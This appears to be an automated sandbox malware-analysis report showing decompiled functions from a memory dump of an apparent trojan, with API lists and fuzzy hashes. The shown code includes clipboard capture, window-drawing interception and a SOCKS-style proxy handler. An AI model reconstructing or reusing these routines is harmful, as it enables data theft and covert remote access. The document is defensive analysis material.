					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E00405885( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E0040B58B( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x004059f6
0x00405a01
0x00405a07
0x00405a10
0x00405a1d
0x00405ac1
0x00405ac9
0x00405ac9
0x00405a23
0x00405a26
0x00405a2f
0x00405a38
0x00405a31
0x00405a31
0x00405a31
0x00405a41
0x00405a85
0x00000000
0x00405a43
0x00405a5c
0x00405a8b
0x00405a96
0x00405aa1
0x00405aa8
0x00405ab4
0x00405abc
0x00405abc
0x00000000
0x00405ab4
0x00405a6d
0x00000000
0x00000000
0x00405a80
0x00405a87
0x00405a89
0x00000000
0x00000000
0x00000000
0x00405a89

APIs

GetWindowInfo.USER32 ref: 00405A15
IntersectRect.USER32 ref: 00405A53
IsRectEmpty.USER32(?), ref: 00405A65
IntersectRect.USER32 ref: 00405A7C
GetTopWindow.USER32(?), ref: 00405AAC

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 9f3af80595b1cd797ac7001e800c99d3af98d12063de9dfea2383cff05319795
Instruction ID: 6e8f32979e9f3d851a5a440f151b4d1899db2f6c9b6478ab25287e6cd186f337
Opcode Fuzzy Hash: 9f3af80595b1cd797ac7001e800c99d3af98d12063de9dfea2383cff05319795
Instruction Fuzzy Hash: EF212CB1200701ABD720DF68D984E57B7ECEF44714B040A2AFC86E3691DB39E8058E75

Uniqueness

Uniqueness Score: -1.00%

Function 004156E6, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004156E6(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				void* _t26;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E00412EC8(_t40, _t50, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E00412E8D(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E004131E9(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E004079D4(_t43);
					_t24 = E00412FEE();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E0040A658(_v12);
						__eflags = 0;
						return 0;
					}
					_t26 = 3;
					E00405B00(_t26,  &_v104);
					_t28 = WaitForSingleObject( *0x423e2c, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E0040B104(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x423e2c, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x004156e6
0x004156e6
0x004156f8
0x00415705
0x0041570a
0x0041570f
0x00415726
0x0041572d
0x00415733
0x0041573b
0x00415741
0x00415748
0x0041574b
0x00415750
0x00415752
0x004157b1
0x004157b4
0x004157b9
0x00000000
0x004157bb
0x0041575b
0x0041575c
0x00415773
0x00415778
0x0041577a
0x004157af
0x00000000
0x004157b0
0x00415783
0x00415786
0x0041579d
0x004157a9
0x004157ab
0x004157ab
0x00000000
0x00415786
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 004156F1
SetThreadPriority.KERNEL32(00000000), ref: 004156F8

Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0041573B
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 00415773
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 004157A9

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 8ea071e3b05098877b0b8fdd310211e2f176845ee0c4e035fd055c89acaaa6a5
Instruction ID: 95cc7c22b8dd04b32f302b43183d0e28ce9e9876c24d9cb63057eb53a46e8498
Opcode Fuzzy Hash: 8ea071e3b05098877b0b8fdd310211e2f176845ee0c4e035fd055c89acaaa6a5
Instruction Fuzzy Hash: 5B219F71A00208EADF11EBA0DD86FDE7779EB44304F500466F500F71A1DA799E858B58

Uniqueness

Uniqueness Score: -1.00%

Function 00405E4D, Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00405E4D(void* _a4) {
				signed int _t11;
				void* _t21;
				void* _t23;
				void* _t24;
				int _t25;

				_t25 = _a4;
				_t23 = GetClipboardData(_t25);
				_a4 = _t23;
				if(E00412FEE() == 0) {
					return _t23;
				}
				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t23);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t25 - 1;
					if(_t11 == 0) {
						_push(_t21);
						_push(0);
						L12:
						_t24 = E004070C5(_t11 | 0xffffffff);
						L15:
						if(_t24 != 0) {
							EnterCriticalSection(0x4223b8);
							E00405B4A(0x40424c);
							E00405B4A(_t24);
							LeaveCriticalSection(0x4223b8);
							if(_t24 != _t21) {
								E00406E85(_t24);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t11 = _t11 - 6;
					if(_t11 == 0) {
						_push(_t21);
						_push(1);
						goto L12;
					}
					if(_t11 != 6) {
						_t24 = _a4;
					} else {
						_t24 = _t21;
					}
					goto L15;
				}
			}

0x00405e51
0x00405e5c
0x00405e5e
0x00405e68
0x00000000
0x00405e6a
0x00405e73
0x00405efb
0x00000000
0x00405e88
0x00405e90
0x00405e94
0x00405efa
0x00000000
0x00405efa
0x00405e98
0x00405e99
0x00405eb8
0x00405eb9
0x00405eac
0x00405eb4
0x00405ec0
0x00405ec2
0x00405eca
0x00405ed5
0x00405edb
0x00405ee1
0x00405ee9
0x00405eec
0x00405eec
0x00405ee9
0x00405ef4
0x00000000
0x00405ef4
0x00405e9b
0x00405e9e
0x00405ea9
0x00405eaa
0x00000000
0x00405eaa
0x00405ea3
0x00405ebd
0x00405ea5
0x00405ea5
0x00405ea5
0x00000000
0x00405ea3

APIs

GetClipboardData.USER32 ref: 00405E56

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

GlobalLock.KERNEL32 ref: 00405E8A
EnterCriticalSection.KERNEL32(004223B8,00000000,00000000), ref: 00405ECA
LeaveCriticalSection.KERNEL32(004223B8,00000000,0040424C), ref: 00405EE1
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00405EF4

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: 61ff5c67e846938906b893246127978924e471db8062ac4fa538f4afbb832f88
Instruction ID: 403609ddd01379b74bee4a7d90fe7afd9ce71d9f342988cc7d2d52cf6c124eb2
Opcode Fuzzy Hash: 61ff5c67e846938906b893246127978924e471db8062ac4fa538f4afbb832f88
Instruction Fuzzy Hash: 7C11E232100A05A7C7112B68CD849BF3629DB81391B15013BF989F72E0DB3C9E429EDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3AA, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 0040A3BC
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040A3E6
WSAGetLastError.WS2_32 ref: 0040A3ED
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A419

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

closesocket.WS2_32(?), ref: 0040A42D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: d4fb12b96c5ab5b350116c0860b937acd0c4d273c20a53b85eec40d0b549ad6a
Instruction ID: 89e52c24bd91186cf4c786c3901de0d589a334b9c456359f7db3651761c680ce
Opcode Fuzzy Hash: d4fb12b96c5ab5b350116c0860b937acd0c4d273c20a53b85eec40d0b549ad6a
Instruction Fuzzy Hash: 29114CB5801228BEDB20AFA5DC4DCDF7E2CEF453A4B104125F80AB61A0D6749E51DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004055FC, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004055FC(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x423968 & 0x00000004) == 0 || E00412FEE() == 0) {
					L9:
					return GetUpdateRect(_t28, _a8, _a12);
				} else {
					_t32 = TlsGetValue( *0x4231bc);
					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
						goto L9;
					} else {
						if(_a8 != 0) {
							_t6 = _t32 + 0xc; // 0xc
							E00406EC1( &_a8, _t6, 0x10);
						}
						if(_a12 != 0) {
							_t20 = SaveDC( *(_t32 + 8));
							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
							RestoreDC( *(_t32 + 8), _t20);
						}
						 *_t32 = 1;
						return 1;
					}
				}
			}

0x00405607
0x0040560b
0x0040567c
0x00000000
0x00405616
0x00405622
0x00405626
0x00000000
0x0040562d
0x00405631
0x00405635
0x0040563d
0x0040563d
0x00405646
0x0040564c
0x0040565c
0x00405664
0x0040566b
0x0040566e
0x00405674
0x00405678
0x00000000
0x00405678
0x00405626

APIs

GetUpdateRect.USER32 ref: 00405683

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

TlsGetValue.KERNEL32 ref: 0040561C
SaveDC.GDI32(?), ref: 0040564C
SendMessageW.USER32(?,00000014,?,00000000), ref: 0040565C
RestoreDC.GDI32(?,00000000), ref: 0040566E

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 9d6cbb6d7906cf29c964b27409cf5362a78b588da7f507b77140296b6c464afa
Instruction ID: 3a1b3d594010145e0e1792a128211bebb79cdf400e28334e839e6c7bd9d2e9cf
Opcode Fuzzy Hash: 9d6cbb6d7906cf29c964b27409cf5362a78b588da7f507b77140296b6c464afa
Instruction Fuzzy Hash: 8E11C271000749AFDB219F61DC48FAB7BA8EB08311F40883AF94AE21A1C7399851CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004057F1, Relevance: 7.5, APIs: 5, Instructions: 48
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004057F1() {
				struct tagMSG _v32;
				signed int _t12;
				char _t17;
				void* _t21;

				SetThreadPriority(GetCurrentThread(), 1);
				SetEvent( *0x4231c4);
				while(1) {
					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
					if(_t12 == 0xffffffff) {
						break;
					}
					if(_t12 == 0) {
						break;
					}
					if(_v32.message ==  *0x4231c0 && _v32.wParam == 0xfffffffc) {
						_t17 = E004050A4( *0x4231c8 + 0x114, _t19, _t21, 0x4231b8, _v32.lParam, 1);
						_t19 =  *0x4231c8;
						 *((char*)( *0x4231c8 + 0x124)) = _t17;
						SetEvent( *0x4231c4);
					}
				}
				return _t12 & 0xffffff00 | _t12 == 0x00000000;
			}

0x00405805
0x00405817
0x00405866
0x00405871
0x00405876
0x00000000
0x00000000
0x00405823
0x00000000
0x00000000
0x0040582f
0x0040584d
0x00405852
0x00405858
0x00405864
0x00405864
0x0040582f
0x00405884

APIs

GetCurrentThread.KERNEL32 ref: 004057FE
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00413AA0), ref: 00405805
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00413AA0), ref: 00405817
SetEvent.KERNEL32(004231B8,?,00000001), ref: 00405864
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00405871

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EventThread$CurrentMessagePriority
String ID:
API String ID: 3943651903-0
Opcode ID: 3cb9351b2f99322f2df29763b7823099a077b4d39ce9e2d02afc4db741460e21
Instruction ID: 92dfb7eb16e7a5e754c12441c9af3806332768242b83c306331877e0614e2210
Opcode Fuzzy Hash: 3cb9351b2f99322f2df29763b7823099a077b4d39ce9e2d02afc4db741460e21
Instruction Fuzzy Hash: A801D6326046009BCB20AB75ED05F677774DF44730F540676F920E21F0D6399521CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F9F0, Relevance: 7.5, APIs: 5, Instructions: 32synchronizationwindowCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040FE29,00000000), ref: 0040F9F6
ReleaseMutex.KERNEL32(?), ref: 0040FA2A
IsWindow.USER32(?), ref: 0040FA31
PostMessageW.USER32(?,00000215,00000000,?), ref: 0040FA4B
SendMessageW.USER32(?,00000215,00000000,?), ref: 0040FA53

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
String ID:
API String ID: 794275546-0
Opcode ID: c4299a2b058347e6a0033ce58f403cc97a7ff5ecde4475a9d4634968951c3c05
Instruction ID: b2c0f3433e7dd703d102c3846a7b1925c29395f2a834ef36a8732b3e700380e5
Opcode Fuzzy Hash: c4299a2b058347e6a0033ce58f403cc97a7ff5ecde4475a9d4634968951c3c05
Instruction Fuzzy Hash: 1DF01974204300DFD3209F24D8489A7BBF5FB89751B048A79F896A77A1D770A845CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00406B66, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00406B66(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E0040A43D(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E00409E38(_t61, _t110) != 0) {
					while(E00409E38(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									_t55 =  &_v24; // 0x414142
									return E00406AF0(_t110, 0xffffffff, _v13,  *_t55) & 0xffffff00 | _t73 != 0x00000000;
								}
								E00406F38( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E00409ECD( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E0040A280(_t116, _t127);
									_t50 =  &_v24; // 0x414142
									_t84 = E00406AF0(_t110, _t127, 0x5a,  *_t50);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E0040A081(_t110);
									}
									E0040A228(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00409FC7( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t32 =  &_v24; // 0x414142
									_t125 = E00406AF0(_t110, _t129, 0x5a,  *_t32);
									if(_t125 != 1) {
										L31:
										E0040A228(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E0040A1F8( &_v20,  &_a4);
									_v36 = _t126;
									E0040A228(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E0040A280(_t116, _t126);
										_t110 = _a4;
										_t125 = E00406AF0(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E0040A081(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E00409E38(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E00406EC1( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x00406b70
0x00406b76
0x00406b86
0x00406b8a
0x00406b8d
0x00406b8e
0x00406b9a
0x00406ba9
0x00406ba7
0x00406bbe
0x00406bd7
0x00406be5
0x00406bee
0x00406c78
0x00406c7c
0x00406c80
0x00406dae
0x00406dae
0x00000000
0x00406dbe
0x00406c8d
0x00406c94
0x00406c95
0x00406c9d
0x00406c9e
0x00406d52
0x00406d5c
0x00406d64
0x00406d69
0x00406ca7
0x00406ca7
0x00000000
0x00406ca7
0x00406d70
0x00406d75
0x00406d7c
0x00406d84
0x00406d91
0x00406d99
0x00406d93
0x00406d93
0x00406d93
0x00406d86
0x00406d86
0x00406d87
0x00406d87
0x00406d9d
0x00406da6
0x00406d44
0x00000000
0x00000000
0x00000000
0x00000000
0x00406da6
0x00406ca5
0x00406cba
0x00406cbc
0x00406cc2
0x00000000
0x00000000
0x00406cc4
0x00406cd0
0x00406cd5
0x00406d2d
0x00406d2d
0x00406d35
0x00000000
0x00000000
0x00406d3e
0x00406d40
0x00406d40
0x00000000
0x00406d3e
0x00406ce7
0x00406ce9
0x00406cec
0x00406cf4
0x00406d03
0x00406d0b
0x00406d1b
0x00406d20
0x00406d22
0x00406d25
0x00406d25
0x00406d2a
0x00000000
0x00406d2a
0x00406cf6
0x00406cf9
0x00000000
0x00406cf9
0x00000000
0x00406ca5
0x00406bf4
0x00406bf6
0x00406bfe
0x00406c07
0x00000000
0x00000000
0x00406c09
0x00406c0c
0x00406c15
0x00406c2b
0x00406c32
0x00406c35
0x00406c3d
0x00406c45
0x00406c53
0x00406c4e
0x00406c66
0x00406c6b
0x00406c6e
0x00406c76
0x00000000
0x00000000
0x00000000
0x00406c76
0x00406c50
0x00406c50
0x00000000
0x00406c57
0x00406c3f
0x00406c3f
0x00000000
0x00406c3f
0x00406c17
0x00406c1e
0x00000000
0x00000000
0x00000000
0x00406c20
0x00000000
0x00406bf6
0x00406ba7
0x00406ba9
0x00406b9c
0x00000000

APIs

Part of subcall function 0040A43D: getsockname.WS2_32(?,?,?), ref: 0040A45B

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00406C35
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00406C6E

Part of subcall function 0040A280: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040A296

Part of subcall function 00406AF0: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00406B14

Part of subcall function 0040A081: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040A121

Strings

[, xrefs: 00406CA7
BAA, xrefs: 00406DAE, 00406D75, 00406CC4

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: BAA$[
API String ID: 1849152701-3148893505
Opcode ID: 00d027916317091e986b18fda68be662bcf2c97eb40999247dbd1b8b770b6ed6
Instruction ID: e603add372eb478c8dbcb6dd8f613e3d5ead5fa8c8945f4ecdd35e39a1949e8c
Opcode Fuzzy Hash: 00d027916317091e986b18fda68be662bcf2c97eb40999247dbd1b8b770b6ed6
Instruction Fuzzy Hash: E6612771E042586ADF10ABA4CC45AEFBBB99F41314F02457BF853F32C2C27C9921876A

Uniqueness

Uniqueness Score: -1.00%

Function 00418059, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00418059(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v76;
				char _v116;
				char _v636;
				short _v1156;
				void* __edi;
				void* __esi;
				void* _t28;
				void* _t30;
				void* _t35;
				void* _t39;
				char* _t42;
				void* _t52;
				WCHAR* _t55;
				char* _t60;
				signed int _t61;
				void* _t62;
				intOrPtr _t70;

				_t54 = __edx;
				_t52 = __ecx;
				E00406F38( &_v12,  &_v12, 0, 8);
				_t28 = 0x60;
				E00405B00(_t28,  &_v116);
				_t30 = 0x61;
				E00405B00(_t30,  &_v52);
				_t55 =  &_v636;
				_t35 = E0040AFA9(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
				if(_t35 != 0xffffffff) {
					_t65 = _t35;
					if(_t35 > 0) {
						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
						E00417E11(_t65,  &_v1156,  &_v12);
					}
				}
				if(_v8 != 0) {
					L9:
					if(_t70 <= 0) {
						return E00406E85(_v12);
					}
					_push(0xcb);
					return E00416CBC(_t54, _v12, 0x63);
				} else {
					_t60 =  &_v76;
					_t39 = 0x62;
					E00405B00(_t39, _t60);
					_v28 = 0x23;
					_v24 = 0x1a;
					_v20 = 0x26;
					_v16 = _t60;
					_t61 = 0;
					do {
						_t42 =  &_v636;
						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
						_t68 = _t42;
						if(_t42 == 0) {
							_t54 =  &_v16;
							E0040C5AE( &_v636,  &_v16, _t68, 1, 2, E00417E6B,  &_v12, 0, 0, 0);
						}
						_t61 = _t61 + 1;
					} while (_t61 < 3);
					_t70 = _v8;
					goto L9;
				}
			}

0x00418059
0x00418059
0x0041806e
0x00418078
0x00418079
0x00418083
0x00418084
0x00418097
0x004180a2
0x004180aa
0x004180ac
0x004180ae
0x004180bb
0x004180cc
0x004180cc
0x004180ae
0x004180d4
0x0041813c
0x0041813c
0x00000000
0x00418153
0x00418141
0x00000000
0x004180d6
0x004180d8
0x004180db
0x004180dc
0x004180e3
0x004180ea
0x004180f1
0x004180f8
0x004180fb
0x004180fd
0x004180fd
0x0041810b
0x00418111
0x00418113
0x00418125
0x0041812e
0x0041812e
0x00418133
0x00418134
0x00418139
0x00000000
0x00418139

APIs

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004180BB
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041810B

Strings

#, xrefs: 004180E3
&, xrefs: 004180F1

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&
API String ID: 1994525040-3870246384
Opcode ID: 88d7a8a8f3fb67cd84d61d69578a1805006c048755a232469c75f4121187936e
Instruction ID: fd5e1bb54affe013dbafb9bc61e953f2c70cbf62e9079f322912f783debe35dc
Opcode Fuzzy Hash: 88d7a8a8f3fb67cd84d61d69578a1805006c048755a232469c75f4121187936e
Instruction Fuzzy Hash: 833144B290021CBADF10ABA1DC89FDFB77CEB04314F10456AF605F7181DA785A858B95

Uniqueness

Uniqueness Score: -1.00%

Function 00418909, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00418909(void* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				char _v68;
				char _v120;
				char _v644;
				short _v1164;
				void* __edi;
